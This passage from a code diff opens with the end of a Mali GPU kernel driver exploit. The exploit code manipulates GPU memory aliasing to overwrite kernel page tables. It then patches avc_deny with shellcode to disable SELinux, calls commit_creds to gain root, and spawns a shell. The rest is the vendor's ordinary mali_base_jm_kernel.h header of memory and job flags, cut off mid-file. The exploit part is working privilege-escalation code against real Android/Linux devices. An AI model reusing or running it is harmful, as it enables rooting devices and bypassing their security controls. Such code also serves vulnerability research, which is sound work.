434	+	ai[0].length = 0x3;
435	+	ai[1].length = 0x3;
436	+	ai[0].offset = 0;
437	+	ai[1].offset = 0;
438	+	alias.in.aliasing_info = (uint64_t)(&(ai[0]));
439	+	mem_alias(mali_fd, &alias);
440	+	void* region = mmap(NULL, 0x2000, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
441	+	if (region == MAP_FAILED) {
442	+	err(1, "mmap failed");
443	+	}
444	+
445	+	//allocate pages before we free the ones in allocated in drain, so that these won't be allocated from the device pool
446	+	reserve_pages(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
447	+
448	+	printf("gpu_va[0] %lx\n", gpu_va[0]);
449	+	printf("gpu_va[1] %lx\n", gpu_va[1]);
450	+	printf("alias %p\n", region);
451	+	munmap(region, 0x2000);
452	+	//Free pages allocated in drain to fill the context pool. Now the context pool is full and subsequent free will return the pages to the device pool
453	+	release_mem_pool(drain);
454	+
455	+	//Free the doubling mapped page, the free'd pages will return to the device pool, some of which we will continue to hold a reference at gpu_va[1]
456	+	munmap((void*)(gpu_va[0]), 0x3000);
457	+
458	+	//Map the pages reserved earlier, the size will ensure that 2 new pgd at level 3 are needed, which will be allocated from the device pool (2 pages) One of
459	+	//these pages will be doubly mapped to gpu_va[1] + 0x1000
460	+	map_reserved(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
461	+	uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)\| 0x443;
462	+	//Writing to gpu_va[1] will now overwrite the level 3 pgd in one of the reserved pages mapped earlier.
463	+	for (int i = 0; i < 2; i++) {
464	+	write_to(mali_fd, gpu_va[1] + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
465	+	}
466	+
467	+	usleep(100000);
468	+	//Go through the reserve pages addresses to write to sel_read_enforce with our own shellcode
469	+	write_func(mali_fd, avc_deny, &(reserved[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
470	+
471	+	//Triggers avc_deny to disable SELinux
472	+	open("/dev/kmsg", O_RDONLY);
473	+
474	+	uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)\| 0x443;
475	+	//Writing to gpu_va[1] will now overwrite the level 3 pgd in one of the reserved pages mapped earlier.
476	+	for (int i = 0; i < 2; i++) {
477	+	write_to(mali_fd, gpu_va[1] + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
478	+	}
479	+
480	+	//Call commit_creds to overwrite process credentials to gain root
481	+	write_func(mali_fd, sel_read_enforce, &(reserved[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
482	+
483	+	run_enforce();
484	+
485	+	cleanup(mali_fd, gpu_va[1], &(reserved[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE);
486	+	usleep(100000);
487	+
488	+	return 0;
489	+	}
490	+
491	+	int main() {
492	+	setbuf(stdout, NULL);
493	+	setbuf(stderr, NULL);
494	+
495	+	select_offset();
496	+
497	+	int ret = -1;
498	+	sleep(1);
499	+	ret = run_exploit();
500	+	if (!ret) system("sh");
501	+	}
502	+

■ ■ ■ ■ ■ ■

mali_base_jm_kernel.h

1	+	/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
2	+	/*
3	+	*
4	+	* (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved.
5	+	*
6	+	* This program is free software and is provided to you under the terms of the
7	+	* GNU General Public License version 2 as published by the Free Software
8	+	* Foundation, and any use by you of this program is subject to the terms
9	+	* of such GNU license.
10	+	*
11	+	* This program is distributed in the hope that it will be useful,
12	+	* but WITHOUT ANY WARRANTY; without even the implied warranty of
13	+	* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14	+	* GNU General Public License for more details.
15	+	*
16	+	* You should have received a copy of the GNU General Public License
17	+	* along with this program; if not, you can access it online at
18	+	* http://www.gnu.org/licenses/gpl-2.0.html.
19	+	*
20	+	*/
21	+
22	+	#ifndef _UAPI_BASE_JM_KERNEL_H_
23	+	#define _UAPI_BASE_JM_KERNEL_H_
24	+
25	+	#include <linux/types.h>
26	+
27	+	typedef __u32 base_mem_alloc_flags;
28	+	/* Memory allocation, access/hint flags.
29	+	*
30	+	* See base_mem_alloc_flags.
31	+	*/
32	+
33	+	/* IN */
34	+	/* Read access CPU side
35	+	*/
36	+	#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0)
37	+
38	+	/* Write access CPU side
39	+	*/
40	+	#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1)
41	+
42	+	/* Read access GPU side
43	+	*/
44	+	#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2)
45	+
46	+	/* Write access GPU side
47	+	*/
48	+	#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3)
49	+
50	+	/* Execute allowed on the GPU side
51	+	*/
52	+	#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4)
53	+
54	+	/* Will be permanently mapped in kernel space.
55	+	* Flag is only allowed on allocations originating from kbase.
56	+	*/
57	+	#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5)
58	+
59	+	/* The allocation will completely reside within the same 4GB chunk in the GPU
60	+	* virtual space.
61	+	* Since this flag is primarily required only for the TLS memory which will
62	+	* not be used to contain executable code and also not used for Tiler heap,
63	+	* it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags.
64	+	*/
65	+	#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6)
66	+
67	+	/* Userspace is not allowed to free this memory.
68	+	* Flag is only allowed on allocations originating from kbase.
69	+	*/
70	+	#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7)
71	+
72	+	#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8)
73	+
74	+	/* Grow backing store on GPU Page Fault
75	+	*/
76	+	#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9)
77	+
78	+	/* Page coherence Outer shareable, if available
79	+	*/
80	+	#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10)
81	+
82	+	/* Page coherence Inner shareable
83	+	*/
84	+	#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11)
85	+
86	+	/* IN/OUT */
87	+	/* Should be cached on the CPU, returned if actually cached
88	+	*/
89	+	#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12)
90	+
91	+	/* IN/OUT */
92	+	/* Must have same VA on both the GPU and the CPU
93	+	*/
94	+	#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13)
95	+
96	+	/* OUT */
97	+	/* Must call mmap to acquire a GPU address for the allocation
98	+	*/
99	+	#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14)
100	+
101	+	/* IN */
102	+	/* Page coherence Outer shareable, required.
103	+	*/
104	+	#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15)
105	+
106	+	/* Protected memory
107	+	*/
108	+	#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16)
109	+
110	+	/* Not needed physical memory
111	+	*/
112	+	#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17)
113	+
114	+	/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the
115	+	* addresses to be the same
116	+	*/
117	+	#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18)
118	+
119	+	/**
120	+	* Bit 19 is reserved.
121	+	*
122	+	* Do not remove, use the next unreserved bit for new flags
123	+	*/
124	+	#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19)
125	+
126	+	/**
127	+	* Memory starting from the end of the initial commit is aligned to 'extension'
128	+	* pages, where 'extension' must be a power of 2 and no more than
129	+	* BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
130	+	*/
131	+	#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20)
132	+
133	+	/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu
134	+	* mode. Some components within the GPU might only be able to access memory
135	+	* that is GPU cacheable. Refer to the specific GPU implementation for more
136	+	* details. The 3 shareability flags will be ignored for GPU uncached memory.
137	+	* If used while importing USER_BUFFER type memory, then the import will fail
138	+	* if the memory is not aligned to GPU and CPU cache line width.
139	+	*/
140	+	#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21)
141	+
142	+	/*
143	+	* Bits [22:25] for group_id (0~15).
144	+	*
145	+	* base_mem_group_id_set() should be used to pack a memory group ID into a
146	+	* base_mem_alloc_flags value instead of accessing the bits directly.
147	+	* base_mem_group_id_get() should be used to extract the memory group ID from
148	+	* a base_mem_alloc_flags value.
149	+	*/
150	+	#define BASEP_MEM_GROUP_ID_SHIFT 22
151	+	#define BASE_MEM_GROUP_ID_MASK \
152	+	((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT)
153	+
154	+	/* Must do CPU cache maintenance when imported memory is mapped/unmapped
155	+	* on GPU. Currently applicable to dma-buf type only.
156	+	*/
157	+	#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26)
158	+
159	+	/* Use the GPU VA chosen by the kernel client */
160	+	#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27)
161	+
162	+	/* OUT */
163	+	/* Kernel side cache sync ops required */
164	+	#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28)
165	+
166	+	/* Force trimming of JIT allocations when creating a new allocation */
167	+	#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29)
168	+
169	+	/* Number of bits used as flags for base memory management
170	+	*
171	+	* Must be kept in sync with the base_mem_alloc_flags flags
172	+	*/
173	+	#define BASE_MEM_FLAGS_NR_BITS 30
174	+
175	+	/* A mask of all the flags which are only valid for allocations within kbase,
176	+	* and may not be passed from user space.
177	+	*/
178	+	#define BASEP_MEM_FLAGS_KERNEL_ONLY \
179	+	(BASEP_MEM_PERMANENT_KERNEL_MAPPING \| BASEP_MEM_NO_USER_FREE \| \
180	+	BASE_MEM_FLAG_MAP_FIXED \| BASEP_MEM_PERFORM_JIT_TRIM)
181	+
182	+	/* A mask for all output bits, excluding IN/OUT bits.
183	+	*/
184	+	#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP
185	+
186	+	/* A mask for all input bits, including IN/OUT bits.
187	+	*/
188	+	#define BASE_MEM_FLAGS_INPUT_MASK \
189	+	(((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK)
190	+
191	+	/* A mask of all currently reserved flags
192	+	*/
193	+	#define BASE_MEM_FLAGS_RESERVED \
194	+	(BASE_MEM_RESERVED_BIT_8 \| BASE_MEM_RESERVED_BIT_19)
195	+
196	+	#define BASEP_MEM_INVALID_HANDLE (0ull << 12)
197	+	#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12)
198	+	#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12)
199	+	#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
200	+	#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12)
201	+	/* reserved handles ..-47<<PAGE_SHIFT> for future special handles */
202	+	#define BASE_MEM_COOKIE_BASE (64ul << 12)
203	+	#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \
204	+	BASE_MEM_COOKIE_BASE)
205	+
206	+	/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the
207	+	* initial commit is aligned to 'extension' pages, where 'extension' must be a power
208	+	* of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
209	+	*/
210	+	#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0)
211	+
212	+	/**
213	+	* If set, the heap info address points to a __u32 holding the used size in bytes;
214	+	* otherwise it points to a __u64 holding the lowest address of unused memory.
215	+	*/
216	+	#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1)
217	+
218	+	/**
219	+	* Valid set of just-in-time memory allocation flags
220	+	*
221	+	* Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr
222	+	* in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set
223	+	* and heap_info_gpu_addr being 0 will be rejected).
224	+	*/
225	+	#define BASE_JIT_ALLOC_VALID_FLAGS \
226	+	(BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP \| BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE)
227	+
228	+	/**
229	+	* typedef base_context_create_flags - Flags to pass to ::base_context_init.
230	+	*
231	+	* Flags can be ORed together to enable multiple things.
232	+	*
233	+	* These share the same space as BASEP_CONTEXT_FLAG_*, and so must
234	+	* not collide with them.
235	+	*/
236	+	typedef __u32 base_context_create_flags;
237	+
238	+	/* No flags set */
239	+	#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0)
240	+
241	+	/* Base context is embedded in a cctx object (flag used for CINSTR
242	+	* software counter macros)
243	+	*/
244	+	#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0)
245	+
246	+	/* Base context is a 'System Monitor' context for Hardware counters.
247	+	*
248	+	* One important side effect of this is that job submission is disabled.
249	+	*/
250	+	#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \
251	+	((base_context_create_flags)1 << 1)
252	+
253	+	/* Bit-shift used to encode a memory group ID in base_context_create_flags
254	+	*/
255	+	#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3)
256	+
257	+	/* Bitmask used to encode a memory group ID in base_context_create_flags
258	+	*/
259	+	#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \
260	+	((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT)
261	+
262	+	/* Bitpattern describing the base_context_create_flags that can be
263	+	* passed to the kernel
264	+	*/
265	+	#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \
266	+	(BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \| \
267	+	BASEP_CONTEXT_MMU_GROUP_ID_MASK)
268	+
269	+	/* Bitpattern describing the ::base_context_create_flags that can be
270	+	* passed to base_context_init()
271	+	*/
272	+	#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \
273	+	(BASE_CONTEXT_CCTX_EMBEDDED \| BASEP_CONTEXT_CREATE_KERNEL_FLAGS)
274	+
275	+	/*
276	+	* Private flags used on the base context
277	+	*
278	+	* These start at bit 31, and run down to zero.
279	+	*
280	+	* They share the same space as base_context_create_flags, and so must
281	+	* not collide with them.
282	+	*/
283	+
284	+	/* Private flag tracking whether job descriptor dumping is disabled */
285	+	#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \
286	+	((base_context_create_flags)(1 << 31))
287	+
288	+	/* Enable additional tracepoints for latency measurements (TL_ATOM_READY,
289	+	* TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST)
290	+	*/
291	+	#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0)
292	+
293	+	/* Indicate that job dumping is enabled. This could affect certain timers
294	+	* to account for the performance impact.
295	+	*/
296	+	#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1)
297	+
298	+	#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS \| \
299	+	BASE_TLSTREAM_JOB_DUMPING_ENABLED)
300	+	/*
301	+	* Dependency stuff, keep it private for now. May want to expose it if
302	+	* we decide to make the number of semaphores a configurable
303	+	* option.
304	+	*/
305	+	#define BASE_JD_ATOM_COUNT 256
306	+
307	+	/* Maximum number of concurrent render passes.
308	+	*/
309	+	#define BASE_JD_RP_COUNT (256)
310	+
311	+	/* Set/reset values for a software event */
312	+	#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1)
313	+	#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0)
314	+
315	+	/**
316	+	* struct base_jd_udata - Per-job data
317	+	*
318	+	* This structure is used to store per-job data, and is completely unused
319	+	* by the Base driver. It can be used to store things such as callback
320	+	* function pointer, data to handle job completion. It is guaranteed to be
321	+	* untouched by the Base driver.
322	+	*
323	+	* @blob: per-job data array
324	+	*/
325	+	struct base_jd_udata {
326	+	__u64 blob[2];
327	+	};
328	+
329	+	/**
330	+	* typedef base_jd_dep_type - Job dependency type.
331	+	*
332	+	* A flags field will be inserted into the atom structure to specify whether a
333	+	* dependency is a data or ordering dependency (by putting it before/after
334	+	* 'core_req' in the structure it should be possible to add without changing
335	+	* the structure size).
336	+	* When the flag is set for a particular dependency to signal that it is an
337	+	* ordering only dependency then errors will not be propagated.
338	+	*/
339	+	typedef __u8 base_jd_dep_type;
340	+
341	+	#define BASE_JD_DEP_TYPE_INVALID (0) /*< Invalid dependency /
342	+	#define BASE_JD_DEP_TYPE_DATA (1U << 0) /*< Data dependency /
343	+	#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /*< Order dependency /
344	+
345	+	/**
346	+	* typedef base_jd_core_req - Job chain hardware requirements.
347	+	*
348	+	* A job chain must specify what GPU features it needs to allow the
349	+	* driver to schedule the job correctly. By not specifying the
350	+	* correct settings can/will cause an early job termination. Multiple
351	+	* values can be ORed together to specify multiple requirements.
352	+	* Special case is ::BASE_JD_REQ_DEP, which is used to express complex
353	+	* dependencies, and that doesn't execute anything on the hardware.
354	+	*/
355	+	typedef __u32 base_jd_core_req;
356	+
357	+	/* Requirements that come from the HW */
358	+
359	+	/* No requirement, dependency only
360	+	*/
361	+	#define BASE_JD_REQ_DEP ((base_jd_core_req)0)
362	+
363	+	/* Requires fragment shaders
364	+	*/
365	+	#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0)
366	+
367	+	/* Requires compute shaders
368	+	*
369	+	* This covers any of the following GPU job types:
370	+	* - Vertex Shader Job
371	+	* - Geometry Shader Job
372	+	* - An actual Compute Shader Job
373	+	*
374	+	* Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the
375	+	* job is specifically just the "Compute Shader" job type, and not the "Vertex
376	+	* Shader" nor the "Geometry Shader" job type.
377	+	*/
378	+	#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1)
379	+
380	+	/* Requires tiling */
381	+	#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2)
382	+
383	+	/* Requires cache flushes */
384	+	#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3)
385	+
386	+	/* Requires value writeback */
387	+	#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4)
388	+
389	+	/* SW-only requirements - the HW does not expose these as part of the job slot
390	+	* capabilities
391	+	*/
392	+
393	+	/* Requires fragment job with AFBC encoding */
394	+	#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13)
395	+
396	+	/* SW-only requirement: coalesce completion events.
397	+	* If this bit is set then completion of this atom will not cause an event to
398	+	* be sent to userspace, whether successful or not; completion events will be
399	+	* deferred until an atom completes which does not have this bit set.
400	+	*
401	+	* This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES.
402	+	*/
403	+	#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5)
404	+
405	+	/* SW Only requirement: the job chain requires a coherent core group. We don't
406	+	* mind which coherent core group is used.
407	+	*/
408	+	#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6)
409	+
410	+	/* SW Only requirement: The performance counters should be enabled only when
411	+	* they are needed, to reduce power consumption.
412	+	*/
413	+	#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7)
414	+
415	+	/* SW Only requirement: External resources are referenced by this atom.
416	+	*
417	+	* This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and
418	+	* BASE_JD_REQ_SOFT_EVENT_WAIT.
419	+	*/
420	+	#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8)
421	+
422	+	/* SW Only requirement: Software defined job. Jobs with this bit set will not be
423	+	* submitted to the hardware but will cause some action to happen within the
424	+	* driver
425	+	*/
426	+	#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9)
427	+
428	+	#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB \| 0x1)
429	+	#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB \| 0x2)
430	+	#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB \| 0x3)
431	+
432	+	/* 0x4 RESERVED for now */
433	+
434	+	/* SW only requirement: event wait/trigger job.
435	+	*
436	+	* - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set.
437	+	* - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the
438	+	* other waiting jobs. It completes immediately.
439	+	* - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it
440	+	* possible for other jobs to wait upon. It completes immediately.
441	+	*/
442	+	#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB \| 0x5)
443	+	#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB \| 0x6)
444	+	#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB \| 0x7)
445	+
446	+	#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB \| 0x8)
447	+
448	+	/* SW only requirement: Just In Time allocation
449	+	*
450	+	* This job requests a single or multiple just-in-time allocations through a
451	+	* list of base_jit_alloc_info structure which is passed via the jc element of
452	+	* the atom. The number of base_jit_alloc_info structures present in the
453	+	* list is passed via the nr_extres element of the atom
454	+	*
455	+	* It should be noted that the id entry in base_jit_alloc_info must not
456	+	* be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE.
457	+	*
458	+	* Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE
459	+	* soft job to free the JIT allocation is still made.
460	+	*
461	+	* The job will complete immediately.
462	+	*/
463	+	#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB \| 0x9)
464	+
465	+	/* SW only requirement: Just In Time free
466	+	*
467	+	* This job requests a single or multiple just-in-time allocations created by
468	+	* BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time
469	+	* allocations is passed via the jc element of the atom.
470	+	*
471	+	* The job will complete immediately.
472	+	*/
473	+	#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB \| 0xa)
474	+
475	+	/* SW only requirement: Map external resource
476	+	*
477	+	* This job requests external resource(s) are mapped once the dependencies
478	+	* of the job have been satisfied. The list of external resources are
479	+	* passed via the jc element of the atom which is a pointer to a
480	+	* base_external_resource_list.
481	+	*/
482	+	#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB \| 0xb)
483	+
484	+	/* SW only requirement: Unmap external resource
485	+	*
486	+	* This job requests external resource(s) are unmapped once the dependencies
487	+	* of the job has been satisfied. The list of external resources are
488	+	* passed via the jc element of the atom which is a pointer to a
489	+	* base_external_resource_list.
490	+	*/
491	+	#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB \| 0xc)
492	+
493	+	/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders)
494	+	*
495	+	* This indicates that the Job Chain contains GPU jobs of the 'Compute
496	+	* Shaders' type.
497	+	*
498	+	* In contrast to BASE_JD_REQ_CS, this does not indicate that the Job
499	+	* Chain contains 'Geometry Shader' or 'Vertex Shader' jobs.
500	+	*/
501	+	#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10)
502	+
503	+	/* HW Requirement: Use the base_jd_atom::device_nr field to specify a
504	+	* particular core group
505	+	*
506	+	* If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag
507	+	* takes priority
508	+	*
509	+	* This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms.
510	+	*
511	+	* If the core availability policy is keeping the required core group turned
512	+	* off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code.
513	+	*/
514	+	#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11)
515	+
516	+	/* SW Flag: If this bit is set then the successful completion of this atom
517	+	* will not cause an event to be sent to userspace
518	+	*/
519	+	#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12)
520	+
521	+	/* SW Flag: If this bit is set then completion of this atom will not cause an
522	+	* event to be sent to userspace, whether successful or not.
523	+	*/
524	+	#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14)
525	+
526	+	/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job.
527	+	*
528	+	* If this bit is set then the GPU's cache will not be cleaned and invalidated
529	+	* until a GPU job starts which does not have this bit set or a job completes
530	+	* which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use
531	+	* if the CPU may have written to memory addressed by the job since the last job
532	+	* without this bit set was submitted.
533	+	*/
534	+	#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15)
535	+
536	+	/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes.
537	+	*
538	+	* If this bit is set then the GPU's cache will not be cleaned and invalidated
539	+	* until a GPU job completes which does not have this bit set or a job starts
540	+	* which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use
541	+	* if the CPU may read from or partially overwrite memory addressed by the job
542	+	* before the next job without this bit set completes.
543	+	*/
544	+	#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16)
545	+
546	+	/* Request the atom be executed on a specific job slot.
547	+	*
548	+	* When this flag is specified, it takes precedence over any existing job slot
549	+	* selection logic.
550	+	*/
551	+	#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17)
552	+
553	+	/* SW-only requirement: The atom is the start of a renderpass.
554	+	*
555	+	* If this bit is set then the job chain will be soft-stopped if it causes the
556	+	* GPU to write beyond the end of the physical pages backing the tiler heap, and
557	+	* committing more memory to the heap would exceed an internal threshold. It may
558	+	* be resumed after running one of the job chains attached to an atom with
559	+	* BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be
560	+	* resumed multiple times until it completes without memory usage exceeding the
561	+	* threshold.
562	+	*
563	+	* Usually used with BASE_JD_REQ_T.
564	+	*/
565	+	#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18)
566	+
567	+	/* SW-only requirement: The atom is the end of a renderpass.
568	+	*
569	+	* If this bit is set then the atom incorporates the CPU address of a
570	+	* base_jd_fragment object instead of the GPU address of a job chain.
571	+	*
572	+	* Which job chain is run depends upon whether the atom with the same renderpass
573	+	* ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or
574	+	* was soft-stopped when it exceeded an upper threshold for tiler heap memory
575	+	* usage.
576	+	*
577	+	* It also depends upon whether one of the job chains attached to the atom has
578	+	* already been run as part of the same renderpass (in which case it would have
579	+	* written unresolved multisampled and otherwise-discarded output to temporary
580	+	* buffers that need to be read back). The job chain for doing a forced read and
581	+	* forced write (from/to temporary buffers) is run as many times as necessary.
582	+	*
583	+	* Usually used with BASE_JD_REQ_FS.
584	+	*/
585	+	#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19)
586	+
587	+	/* SW-only requirement: The atom needs to run on a limited core mask affinity.
588	+	*
589	+	* If this bit is set then the kbase_context.limited_core_mask will be applied
590	+	* to the affinity.
591	+	*/
592	+	#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20)
593	+
594	+	/* These requirement bits are currently unused in base_jd_core_req
595	+	*/
596	+	#define BASEP_JD_REQ_RESERVED \
597	+	(~(BASE_JD_REQ_ATOM_TYPE \| BASE_JD_REQ_EXTERNAL_RESOURCES \| \
598	+	BASE_JD_REQ_EVENT_ONLY_ON_FAILURE \| BASEP_JD_REQ_EVENT_NEVER \| \
599	+	BASE_JD_REQ_EVENT_COALESCE \| \
600	+	BASE_JD_REQ_COHERENT_GROUP \| BASE_JD_REQ_SPECIFIC_COHERENT_GROUP \| \
601	+	BASE_JD_REQ_FS_AFBC \| BASE_JD_REQ_PERMON \| \
602	+	BASE_JD_REQ_SKIP_CACHE_START \| BASE_JD_REQ_SKIP_CACHE_END \| \
603	+	BASE_JD_REQ_JOB_SLOT \| BASE_JD_REQ_START_RENDERPASS \| \
604	+	BASE_JD_REQ_END_RENDERPASS \| BASE_JD_REQ_LIMITED_CORE_MASK))
605	+
606	+	/* Mask of all bits in base_jd_core_req that control the type of the atom.
